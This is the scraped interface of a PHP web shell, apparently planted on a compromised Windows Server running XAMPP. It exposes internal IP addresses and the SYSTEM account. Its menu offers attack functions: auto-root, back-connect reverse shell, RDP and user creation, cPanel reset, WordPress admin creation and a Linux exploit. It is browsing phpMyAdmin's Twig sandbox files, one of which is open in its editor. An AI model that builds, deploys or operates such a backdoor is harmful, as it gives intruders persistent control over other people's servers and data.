Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
vendor /
twig /
twig /
src /
Sandbox /
[ HOME SHELL ]
Name
Size
Permission
Action
SecurityError.php
483
B
-rw-rw-rw-
SecurityNotAllowedFilterError....
1.49
KB
-rw-rw-rw-
SecurityNotAllowedFunctionErro...
1.5
KB
-rw-rw-rw-
SecurityNotAllowedMethodError....
1.64
KB
-rw-rw-rw-
SecurityNotAllowedPropertyErro...
1.66
KB
-rw-rw-rw-
SecurityNotAllowedTagError.php
1.45
KB
-rw-rw-rw-
SecurityPolicy.php
3.94
KB
-rw-rw-rw-
SecurityPolicyInterface.php
829
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SecurityPolicyInterface.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Sandbox; /** * Interface that all security policy classes must implements. * * @author Fabien Potencier <fabien@symfony.com> */ interface SecurityPolicyInterface { /** * @throws SecurityError */ public function checkSecurity($tags, $filters, $functions); /** * @throws SecurityNotAllowedMethodError */ public function checkMethodAllowed($obj, $method); /** * @throws SecurityNotAllowedPropertyError */ public function checkPropertyAllowed($obj, $method); } class_alias('Twig\Sandbox\SecurityPolicyInterface', 'Twig_Sandbox_SecurityPolicyInterface');
Close